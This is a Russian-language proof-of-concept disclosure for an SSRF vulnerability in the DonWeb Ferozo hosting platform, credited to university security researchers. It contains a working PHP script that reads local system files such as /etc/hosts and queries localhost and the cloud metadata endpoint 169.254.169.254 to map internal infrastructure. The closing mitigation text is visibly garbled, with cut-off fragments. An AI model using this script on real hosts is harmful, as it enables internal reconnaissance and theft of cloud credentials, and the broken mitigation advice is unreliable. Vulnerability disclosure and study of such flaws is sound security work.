
Доказательство концепции эксплуатации CVE-2025-45955, демонстрирующее подделку серверных запросов (SSRF) в хостинг-платформе DonWeb Ferozo, позволяющее картирование внутренней инфраструктуры и перечисление метаданных облака.
Атакующий может воспользоваться этой уязвимостью, загрузив и выполнив специально созданный PHP-файл на хостинг-платформе Ferozo. При обращении к файлу запускается серия SSRF-попыток, нацеленных на внутренние сервисы (такие как 127.0.0.1, 169.254.169.254 или эндпоинты сервисной сетки), локальные файлы (например, file:///etc/passwd) и известные эндпоинты облачных метаданных. Скрипт собирает ответы или сообщения об ошибках, что позволяет атакующему составить карту внутренней инфраструктуры, перечислить доступные сервисы и собрать конфиденциальную информацию для дальнейшей эксплуатации.
Следующий код демонстрирует уязвимость:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen и т. д.)127.0.0.0/8, 169.254.169.254 и т. д.) с помощью исходящих правил межсетевого экранаCVE-2025-45955
Сообщили: [Facundo Fernandez, Jinook Kim, Surendra Puppala / исследователи безопасности | @BYU]